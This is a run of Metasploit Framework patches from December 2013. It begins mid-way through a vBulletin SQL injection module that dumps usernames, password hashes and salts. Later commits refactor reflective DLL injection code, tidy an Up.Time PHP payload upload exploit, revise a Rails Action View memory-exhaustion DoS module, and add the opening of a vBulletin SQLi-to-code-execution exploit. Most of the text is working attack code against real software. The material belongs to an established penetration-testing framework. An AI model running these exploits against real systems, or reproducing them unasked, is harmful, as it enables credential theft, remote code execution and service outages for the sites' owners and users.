+      'vars_post' =>
+        {
+          'nodeid'  => "#{node}#{injection}",
+        }
+      })
+
+    unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
+      return nil
+    end
+
+    data = ""
+
+    if res.body.to_s =~ /#{mark}(.*)#{mark}/
+      data = $1
+    end
+
+    return data
+  end
+
+  def get_user_data(node_id, user_id)
+    user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
+    pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
+    salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")
+
+    return [user, pass, salt]
+  end
+
+  def check
+    node_id = get_node
+
+    unless node_id.nil?
+      return Msf::Exploit::CheckCode::Vulnerable
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "index.php")
+    })
+
+    if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/
+      return Msf::Exploit::CheckCode::Detected
+    end
+
+    return Msf::Exploit::CheckCode::Unknown
+  end
+
+  def run
+    print_status("#{peer} - Checking for a valid node id...")
+    node_id = get_node
+    if node_id.nil?
+      print_error("#{peer} - node id not found")
+      return
+    end
+
+    print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...")
+    data = do_sqli(node_id, "select count(*) from user")
+    if data.nil? or data.empty?
+      print_error("#{peer} - Error exploiting sqli")
+      return
+    end
+    count_users = data.to_i
+    print_good("#{peer} - #{count_users} users found")
+
+    users_table = Rex::Ui::Text::Table.new(
+      'Header'  => 'vBulletin Users',
+      'Ident'   => 1,
+      'Columns' => ['Username', 'Password Hash', 'Salt']
+    )
+
+    for i in 0..count_users
+      user = get_user_data(node_id, i)
+      report_auth_info({
+       :host => rhost,
+       :port => rport,
+       :user => user[0],
+       :pass => user[1],
+       :type => "hash",
+       :sname => (ssl ? "https" : "http"),
+       :proof => "salt: #{user[2]}" # Using proof to store the hash salt
+      })
+      users_table << user
+    end
+
+    print_line(users_table.to_s)
+  end
+
+
+end
+

From 2cb991caceb5c07631c5b0d84c497a08c3914337 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 6 Dec 2013 08:25:24 +1000
Subject: [PATCH 186/217] Shuffle RDI stuff into more appropriate structure

Now broken into two modules, one for loading RDI DLLs off disk and
finding the loader function offset, and another for doing the process
specific stuff of loading into the target.
---
 .../payload/windows/reflectivedllinject.rb    |  4 +-
 .../windows/x64/reflectivedllinject.rb        |  4 +-
 .../windows}/reflective_dll_injection.rb      | 33 +++-------------
 lib/msf/core/reflective_dll_loader.rb         | 39 +++++++++++++++++++
 .../windows/local/ms10_015_kitrap0d.rb        |  8 ++--
 .../exploits/windows/local/ppr_flatten_rec.rb |  4 +-
 .../windows/manage/reflective_dll_inject.rb   |  4 +-
 7 files changed, 56 insertions(+), 40 deletions(-)
 rename lib/msf/core/{ => post/windows}/reflective_dll_injection.rb (66%)
 create mode 100644 lib/msf/core/reflective_dll_loader.rb

diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb
index db0434a058..48e547a24d 100644
--- a/lib/msf/core/payload/windows/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/reflectivedllinject.rb
@@ -1,7 +1,7 @@
 # -*- coding: binary -*-
 
 require 'msf/core'
-require 'msf/core/reflective_dll_injection'
+require 'msf/core/reflective_dll_loader'
 
 module Msf
 
@@ -15,7 +15,7 @@ module Msf
 
 module Payload::Windows::ReflectiveDllInject
 
-  include Msf::ReflectiveDLLInjection
+  include Msf::ReflectiveDLLLoader
   include Msf::Payload::Windows
 
   def initialize(info = {})
diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
index dbe4b0f075..31e5d86d5b 100644
--- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
@@ -1,7 +1,7 @@
 # -*- coding: binary -*-
 
 require 'msf/core'
-require 'msf/core/reflective_dll_injection'
+require 'msf/core/reflective_dll_loader'
 
 module Msf
 
@@ -15,7 +15,7 @@ module Msf
 
 module Payload::Windows::ReflectiveDllInject_x64
 
-  include Msf::ReflectiveDLLInjection
+  include Msf::ReflectiveDLLLoader
   include Msf::Payload::Windows
 
   def initialize(info = {})
diff --git a/lib/msf/core/reflective_dll_injection.rb b/lib/msf/core/post/windows/reflective_dll_injection.rb
similarity index 66%
rename from lib/msf/core/reflective_dll_injection.rb
rename to lib/msf/core/post/windows/reflective_dll_injection.rb
index c8a46e7c09..6d38da97b6 100644
--- a/lib/msf/core/reflective_dll_injection.rb
+++ b/lib/msf/core/post/windows/reflective_dll_injection.rb
@@ -1,5 +1,7 @@
 # -*- coding: binary -*-
 
+require 'msf/core/reflective_dll_loader'
+
 ###
 #
 # This module exposes functionality which makes it easier to do
@@ -7,7 +9,9 @@
 #
 ###
 
-module Msf::ReflectiveDLLInjection
+module Msf::Post::Windows::ReflectiveDLLInjection
+
+  include Msf::ReflectiveDLLLoader
 
   PAGE_ALIGN = 1024
 
@@ -34,33 +38,6 @@ module Msf::ReflectiveDLLInjection
     return shellcode_mem
   end
 
-  #
-  # Load a reflectively-injectable DLL from disk and find the offset
-  # to the ReflectiveLoader function inside the DLL.
-  #
-  # @param dll_path Path to the DLL to load.
-  #
-  # @return [Array] Tuple of DLL contents and offset to the
-  #                 +ReflectiveLoader+ function within the DLL.
-  #
-  def load_rdi_dll(dll_path)
-    dll = ''
-    offset = nil
-
-    ::File.open(dll_path, 'rb') { |f| dll = f.read }
-
-    pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
-
-    pe.exports.entries.each do |e|
-      if e.name =~ /^\S*ReflectiveLoader\S*/
-        offset = pe.rva_to_file_offset(e.rva)
-        break
-      end
-    end
-
-    return dll, offset
-  end
-
   #
   # Inject a reflectively-injectable DLL into the given process
   # using reflective injection.
diff --git a/lib/msf/core/reflective_dll_loader.rb b/lib/msf/core/reflective_dll_loader.rb
new file mode 100644
index 0000000000..9adfa27893
--- /dev/null
+++ b/lib/msf/core/reflective_dll_loader.rb
@@ -0,0 +1,39 @@
+# -*- coding: binary -*-
+
+###
+#
+# This mixin contains functionality which loads a Reflective
+# DLL from disk into memory and finds the offset of the
+# reflective loader's entry point.
+#
+###
+
+module Msf::ReflectiveDLLLoader
+
+  #
+  # Load a reflectively-injectable DLL from disk and find the offset
+  # to the ReflectiveLoader function inside the DLL.
+  #
+  # @param dll_path Path to the DLL to load.
+  #
+  # @return [Array] Tuple of DLL contents and offset to the
+  #                 +ReflectiveLoader+ function within the DLL.
+  #
+  def load_rdi_dll(dll_path)
+    dll = ''
+    offset = nil
+
+    ::File.open(dll_path, 'rb') { |f| dll = f.read }
+
+    pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
+
+    pe.exports.entries.each do |e|
+      if e.name =~ /^\S*ReflectiveLoader\S*/
+        offset = pe.rva_to_file_offset(e.rva)
+        break
+      end
+    end
+
+    return dll, offset
+  end
+end
diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
index 360a3edab6..4e86076e8c 100644
--- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb
+++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
@@ -4,16 +4,16 @@
 ##
 
 require 'msf/core'
-require 'msf/core/reflective_dll_injection'
+require 'msf/core/post/windows/reflective_dll_injection'
 require 'msf/core/exploit/exe'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = GreatRanking
 
-  include Msf::ReflectiveDLLInjection
-  include Post::File
-  include Post::Windows::Priv
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::ReflectiveDLLInjection
 
   def initialize(info={})
     super( update_info( info,
diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index b2b10d4656..264f3e991e 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -4,17 +4,17 @@
 ##
 
 require 'msf/core'
-require 'msf/core/reflective_dll_injection'
+require 'msf/core/post/windows/reflective_dll_injection'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
-  include Msf::ReflectiveDLLInjection
   include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
   include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
 
   def initialize(info={})
     super(update_info(info, {
diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb
index 75da1ba66c..c2f4db4681 100644
--- a/modules/post/windows/manage/reflective_dll_inject.rb
+++ b/modules/post/windows/manage/reflective_dll_inject.rb
@@ -4,12 +4,12 @@
 ##
 
 require 'msf/core'
-require 'msf/core/reflective_dll_injection'
+require 'msf/core/post/windows/reflective_dll_injection'
 require 'rex'
 
 class Metasploit3 < Msf::Post
 
-  include Msf::ReflectiveDLLInjection
+  include Msf::Post::Windows::ReflectiveDLLInjection
 
   def initialize(info={})
     super( update_info( info,

From f2f8c08c8e14ecdc191c2b0456f1c5009a82fb8d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 5 Dec 2013 16:36:44 -0600
Subject: [PATCH 187/217] Use blank? method

---
 modules/auxiliary/gather/vbulletin_vote_sqli.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb
index 985b6bbc37..6c6cbbce21 100644
--- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb
+++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb
@@ -155,7 +155,7 @@ class Metasploit3 < Msf::Auxiliary
 
     print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...")
     data = do_sqli(node_id, "select count(*) from user")
-    if data.nil? or data.empty?
+    if data.blank?
       print_error("#{peer} - Error exploiting sqli")
       return
     end

From 5a0a2217dc8bb2723ca2aa019d6f92749c49d884 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 6 Dec 2013 09:18:08 +1000
Subject: [PATCH 188/217] Add exception if DLL isn't RDI enabled

---
 lib/msf/core/reflective_dll_loader.rb | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/lib/msf/core/reflective_dll_loader.rb b/lib/msf/core/reflective_dll_loader.rb
index 9adfa27893..546be8ceba 100644
--- a/lib/msf/core/reflective_dll_loader.rb
+++ b/lib/msf/core/reflective_dll_loader.rb
@@ -34,6 +34,10 @@ module Msf::ReflectiveDLLLoader
       end
     end
 
+    unless offset
+      raise "Cannot find the ReflectiveLoader entry point in #{dll_path}"
+    end
+
     return dll, offset
   end
 end

From ccbf305de199517af378ce44a7155ce26114d940 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 6 Dec 2013 09:26:46 +1000
Subject: [PATCH 189/217] Remove exception stuff from the payloads

---
 lib/msf/core/payload/windows/reflectivedllinject.rb  | 12 ++----------
 .../core/payload/windows/x64/reflectivedllinject.rb  | 12 ++----------
 2 files changed, 4 insertions(+), 20 deletions(-)

diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb
index 48e547a24d..e3195bd683 100644
--- a/lib/msf/core/payload/windows/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/reflectivedllinject.rb
@@ -51,16 +51,8 @@ module Payload::Windows::ReflectiveDllInject
   end
 
   def stage_payload(target_id=nil)
-    dll    = ""
-    offset = 0
-
-    begin
-      dll, offset = load_rdi_dll(library_path)
-      raise "Can't find an exported ReflectiveLoader function!" unless offset
-    rescue
-      print_error( "Failed to read and parse Dll file: #{$!}" )
-      return
-    end
+    # Exceptions will be thrown by the mixin if there are issues.
+    dll, offset = load_rdi_dll(library_path)
 
     exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration
 
diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
index 31e5d86d5b..5a0e52e018 100644
--- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
@@ -51,16 +51,8 @@ module Payload::Windows::ReflectiveDllInject_x64
   end
 
   def stage_payload
-    dll    = ""
-    offset = 0
-
-    begin
-      dll, offset = load_rdi_dll(library_path)
-      raise "Can't find an exported ReflectiveLoader function!" unless offset
-    rescue
-      print_error( "Failed to read and parse Dll file: #{$!}" )
-      return
-    end
+    # Exceptions will be thrown by the mixin if there are issues.
+    dll, offset = load_rdi_dll(library_path)
 
     exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration
 

From 73d3ea699fa7bc9746d32c707d1f0d793f8bb94a Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 6 Dec 2013 09:32:21 +1000
Subject: [PATCH 190/217] Remove the last redundant error check

---
 modules/post/windows/manage/reflective_dll_inject.rb | 10 +++-------
 1 file changed, 3 insertions(+), 7 deletions(-)

diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb
index c2f4db4681..0b3b651270 100644
--- a/modules/post/windows/manage/reflective_dll_inject.rb
+++ b/modules/post/windows/manage/reflective_dll_inject.rb
@@ -45,13 +45,9 @@ class Metasploit3 < Msf::Post
     print_status("Injecting #{datastore['PATH']} into #{pid} ...")
     dll_mem, offset = inject_dll_into_process(host_process, datastore['PATH'])
 
-    if dll_mem && offset
-      print_status("DLL injected. Executing ReflectiveLoader ...")
-      host_process.thread.create(dll_mem + offset, 0)
-      print_good("DLL injected and invoked.")
-    else
-      print_error("DLL doesn't appear to be reflectively injectable.")
-    end
+    print_status("DLL injected. Executing ReflectiveLoader ...")
+    host_process.thread.create(dll_mem + offset, 0)
+    print_good("DLL injected and invoked.")
   end
 end
 

From c07686988c8102b44fe8751a99119bdd1e18f5d3 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 5 Dec 2013 18:07:24 -0600
Subject: [PATCH 191/217] random uri

---
 modules/auxiliary/dos/http/rails_action_view.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index a62edfa19b..e12b8544d1 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def http_request
     http = ''
-    http << "GET /blah HTTP/1.1\r\n"
+    http << "GET /#{Rex::Text.rand_text_alpha(6)} HTTP/1.1\r\n"
     http << "Host: #{host}\r\n"
     http << "Accept: #{long_string}\r\n"
     http << "\r\n"

From 155836ddf9651d3a597b8c23af2e1abeac95c070 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 6 Dec 2013 10:08:38 +1000
Subject: [PATCH 192/217] Adjusted style as per egypt's points

---
 .../core/post/windows/reflective_dll_injection.rb  | 14 ++++++++------
 1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/post/windows/reflective_dll_injection.rb b/lib/msf/core/post/windows/reflective_dll_injection.rb
index 6d38da97b6..2a3c8779bd 100644
--- a/lib/msf/core/post/windows/reflective_dll_injection.rb
+++ b/lib/msf/core/post/windows/reflective_dll_injection.rb
@@ -18,11 +18,12 @@ module Msf::Post::Windows::ReflectiveDLLInjection
   #
   # Inject the given shellcode into a target process.
   #
-  # @param process The process to inject the shellcode into.
-  # @param shellcode The shellcode to inject.
+  # @param process [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process]
+  #   The process to inject the shellcode into.
+  # @param shellcode [String] The shellcode to inject.
   #
   # @return [Fixnum] Address of the shellcode in the target process's
-  #                  memory.
+  #   memory.
   #
   def inject_into_process(process, shellcode)
     shellcode_size = shellcode.length
@@ -42,11 +43,12 @@ module Msf::Post::Windows::ReflectiveDLLInjection
   # Inject a reflectively-injectable DLL into the given process
   # using reflective injection.
   #
-  # @param process The process that will have the DLL injected into it.
-  # @param dll_path Path to the DLL that is to be loaded and injected.
+  # @param process [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process]
+  #   The process to inject the shellcode into.
+  # @param dll_path [String] Path to the DLL that is to be loaded and injected.
   #
   # @return [Array] Tuple of allocated memory address and offset to the
-  #                 +ReflectiveLoader+ function.
+  #   +ReflectiveLoader+ function.
   #
   def inject_dll_into_process(process, dll_path)
     dll, offset = load_rdi_dll(dll_path)

From 3d327363af41fe52f5f05f09594d0a1559195721 Mon Sep 17 00:00:00 2001
From: DoI <denis.andzakovic@security-assessment.com>
Date: Fri, 6 Dec 2013 13:45:22 +1300
Subject: [PATCH 193/217] uptime_file_upload code tidy-ups

---
 .../exploits/linux/http/uptime_file_upload.rb | 25 +++++++++----------
 1 file changed, 12 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb
index d5102a13ee..2e60fb4eb3 100644
--- a/modules/exploits/linux/http/uptime_file_upload.rb
+++ b/modules/exploits/linux/http/uptime_file_upload.rb
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 
@@ -55,32 +53,33 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'    => normalize_uri(uri, 'wizards', 'post2file.php')
     })
 
-    if not res or res.code != 200
-      return Exploit::CheckCode::Unknown
+    if res and res.code == 200
+      return Exploit::CheckCode::Appears
     end
 
-    return Exploit::CheckCode::Appears
+    return Exploit::CheckCode::Unknown
+
   end
 
   def exploit
     print_status("#{peer} - Uploading PHP to Up.Time server")
     uri =  target_uri.path
 
-    peer = "#{rhost}:#{rport}"
     @payload_name = "#{rand_text_alpha(5)}.php"
     php_payload = get_write_exec_payload(:unlink_self=>true)
 
-    data = Rex::MIME::Message.new
-    post_data = "file_name=#{@payload_name}&script=#{php_payload}"
-
+    post_data = ({
+      "file_name" => @payload_name,
+      "script" => php_payload
+    })
 
     print_status("#{peer} - Uploading payload #{@payload_name}")
     res = send_request_cgi({
       'method' => 'POST',
       'uri'    => normalize_uri(uri, 'wizards', 'post2file.php'),
-      'data'   => post_data,
+      'vars_post'   => post_data,
     })
-    if not res or res.code != 200
+    unless res and res.code == 200
       fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 

From e90b7641cace1409734b5556fd9679cafce108f3 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 6 Dec 2013 14:53:04 +1000
Subject: [PATCH 194/217] Allow self-destruct via "kill -s"

HTTP(s) payloads don't exit cleanly at the moment. This is an issue that's
being addressed through other work. However, there's a need to be able to
terminate the current HTTP(s) session forcably.

This commit add a -s option to kill, which (when specified) will kill
the current session.
---
 .../console/command_dispatcher/stdapi/sys.rb  | 24 ++++++++++++-------
 1 file changed, 16 insertions(+), 8 deletions(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index e809b4c406..b92dbf9620 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -329,13 +329,20 @@ class Console::CommandDispatcher::Stdapi::Sys
       return true
     end
 
-    # validate all the proposed pids first so we can bail if one is bogus
-    valid_pids = validate_pids(args)
-    args.uniq!
-    diff = args - valid_pids.map {|e| e.to_s}
-    if not diff.empty? # then we had an invalid pid
-      print_error("The following pids are not valid:  #{diff.join(", ").to_s}.  Quitting")
-      return false
+    self_destruct = args.include?("-s")
+
+    if self_destruct
+      valid_pids = [client.sys.process.getpid.to_i]
+    else
+      valid_pids = validate_pids(args)
+
+      # validate all the proposed pids first so we can bail if one is bogus
+      args.uniq!
+      diff = args - valid_pids.map {|e| e.to_s}
+      if not diff.empty? # then we had an invalid pid
+        print_error("The following pids are not valid:  #{diff.join(", ").to_s}.  Quitting")
+        return false
+      end
     end
 
     # kill kill kill
@@ -348,8 +355,9 @@ class Console::CommandDispatcher::Stdapi::Sys
   # help for the kill command
   #
   def cmd_kill_help
-    print_line("Usage: kill pid1 pid2 pid3 ...")
+    print_line("Usage: kill [pid1 [pid2 [pid3 ...]]] [-s]")
     print_line("Terminate one or more processes.")
+    print_line(" -s : Kills the pid associated with the current session.")
   end
 
   #

From 89ef1d4720a06274fe830e3624636c39dc6288de Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 6 Dec 2013 00:44:12 -0600
Subject: [PATCH 195/217] Fix a typo in mswin_tiff_overflow

---
 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 777f87a872..fc5c7fcbd3 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Targets'        =>
         [
           # XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit)
-          ['Windows XP SP3 with Office Starndard 2010', {}],
+          ['Windows XP SP3 with Office Standard 2010', {}],
         ],
       'Privileged'     => false,
       'DisclosureDate' => "Nov 5 2013", # Microsoft announcement

From 5d4acfa274d0239ed9b465d084ed1b0dc1cca9a8 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 6 Dec 2013 11:57:02 -0600
Subject: [PATCH 196/217] Plenty of changes

---
 .../auxiliary/dos/http/rails_action_view.rb   | 37 +++++++++++++------
 1 file changed, 25 insertions(+), 12 deletions(-)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index e12b8544d1..d933eb18a3 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -3,10 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 require 'msf/core'
 
-
 class Metasploit3 < Msf::Auxiliary
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Dos
@@ -15,10 +13,10 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Ruby-on-Rails Action View MIME Memory Exhaustion',
       'Description'    => %q{
-        This module exploits a Denial of Service (DoS) condition in the handling of MIME caching
-        of Action View. By sending a specially crafted 'Accept' header to a rails application,
-        it is possible for it to store the invalid MIME type, and may eventually consumes all
-        memory if enough invalid MIMEs are given.
+        This module exploits a Denial of Service (DoS) condition in Action View that requires
+        a controller action. By sending a specially crafted content-type header to a rails
+        application, it is possible for it to store the invalid MIME type, and may eventually
+        consumes all memory if enough invalid MIMEs are given.
 
         Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
       },
@@ -40,6 +38,7 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(80),
+        OptString.new('URIPATH',    [true, 'The URI to send the requests to', '/application']),
         OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),
         OptInt.new('REQ_COUNT',     [true, 'Number of HTTP requests for each iteration', 500]),
         OptInt.new('RLIMIT',        [true,  "Number of requests to send", 100000])
@@ -48,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def host
-      host = datastore['RHOST']
-      host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
-      host
+    host = datastore['RHOST']
+    host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
+    host
   end
 
   def long_string
@@ -58,8 +57,11 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def http_request
+    uri = datastore['URIPATH']
+    uri = "/#{uri}" if uri !~ /^\//
+
     http = ''
-    http << "GET /#{Rex::Text.rand_text_alpha(6)} HTTP/1.1\r\n"
+    http << "GET /#{datastore['URIPATH']} HTTP/1.1\r\n"
     http << "Host: #{host}\r\n"
     http << "Accept: #{long_string}\r\n"
     http << "\r\n"
@@ -77,13 +79,24 @@ class Metasploit3 < Msf::Auxiliary
         disconnect
       }
 
-      print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
+      print_status("Attack finished. Either the server isn't vulnerable, or please dos harder.")
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
       print_status("Unable to connect to #{host}.")
     rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
-      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
+      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached.")
     ensure
       disconnect
     end
   end
 end
+
+=begin
+
+Reproduce:
+
+1. Add a def index; end to ApplicationController
+2. Add an empty index.html.erb file to app/views/application/index.html.erb
+3. Uncomment the last line in routes.rb
+4. Hit /application 
+  
+=end

From 87e77b358e123a7779c3aa3e07acff75f6303633 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 6 Dec 2013 12:08:19 -0600
Subject: [PATCH 197/217] Use the correct URI

---
 modules/auxiliary/dos/http/rails_action_view.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index d933eb18a3..9c95057bea 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
     uri = "/#{uri}" if uri !~ /^\//
 
     http = ''
-    http << "GET /#{datastore['URIPATH']} HTTP/1.1\r\n"
+    http << "GET /#{uri} HTTP/1.1\r\n"
     http << "Host: #{host}\r\n"
     http << "Accept: #{long_string}\r\n"
     http << "\r\n"

From d47292ba109757a285b70446cfe73d2ea6b28048 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 6 Dec 2013 13:50:12 -0600
Subject: [PATCH 198/217] Add module for CVE-2013-3522

---
 .../unix/webapp/vbulletin_vote_sqli_exec.rb   | 458 ++++++++++++++++++
 1 file changed, 458 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb

diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
new file mode 100644
index 0000000000..998b4996b1
--- /dev/null
+++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
@@ -0,0 +1,458 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',
+      'Description'    => %q{
+        This module exploits a SQL Injection vulnerability found in vBulletin 5 that has
+        been used in the wild since March 2013. This module uses the sqli to extract the
+        web application's usernames and hashes. With the retrieved information tries to
+        log into the admin control panel in order to deploy the PHP payload. This module
+        has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu
+        Linux distribution.
+      },
+      'Author'         =>
+        [
+          'Orestis Kourides', # Vulnerability discovery and PoC
+          'juan vazquez' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-3522' ],
+          [ 'OSVDB', '92031' ],
+          [ 'EDB', '24882' ],
+          [ 'BID', '58754' ],
+          [ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
+        ],
+      'Privileged'     => false, # web server context
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 10000 # Just value big enough to fit any php payload
+        },
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'vBulletin 5.0.0 Beta 11-28', { }]],
+      'DisclosureDate' => 'Mar 25 2013',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']),
+        OptInt.new("NODE", [false, 'Valid Node ID']),
+        OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
+        OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
+      ], self.class)
+  end
+
+  def exists_node?(id)
+    mark = rand_text_alpha(8 + rand(5))
+    result = do_sqli(id, "select '#{mark}'")
+
+    if result and result =~ /#{mark}/
+      return true
+    end
+
+    return false
+  end
+
+  def brute_force_node
+    min = datastore["MINNODE"]
+    max = datastore["MAXNODE"]
+
